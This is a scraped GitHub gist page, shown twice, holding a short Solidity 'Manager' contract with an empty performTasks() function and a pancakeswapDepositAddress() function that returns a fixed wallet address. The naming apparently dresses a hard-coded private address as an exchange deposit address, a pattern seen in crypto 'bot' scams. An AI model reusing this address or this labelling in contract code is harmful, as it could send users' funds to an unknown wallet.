Skip to content

Instantly share code, notes, and snippets.

@joyjitpal100
joyjitpal100 / .deps...ipfs...ipfs...QmeReeFaUx4JuHPop2PB56ZzFTSa5ctzeS6WoaNQVpVf9h
Created June 17, 2021 22:05
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.6.12+commit.27d51765.js&optimize=false&runs=200&gist=
pragma solidity ^0.6.6;
contract Manager {
function performTasks() public {
}
function pancakeswapDepositAddress() public pure returns (address) {
return 0xDC31ed1f220C45D575b66E587e7BF2A4867E742D;
}
@joyjitpal100
joyjitpal100 / .deps...ipfs...ipfs...QmeReeFaUx4JuHPop2PB56ZzFTSa5ctzeS6WoaNQVpVf9h
Created June 17, 2021 22:05
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.6.12+commit.27d51765.js&optimize=false&runs=200&gist=
pragma solidity ^0.6.6;
contract Manager {
function performTasks() public {
}
function pancakeswapDepositAddress() public pure returns (address) {
return 0xDC31ed1f220C45D575b66E587e7BF2A4867E742D;
}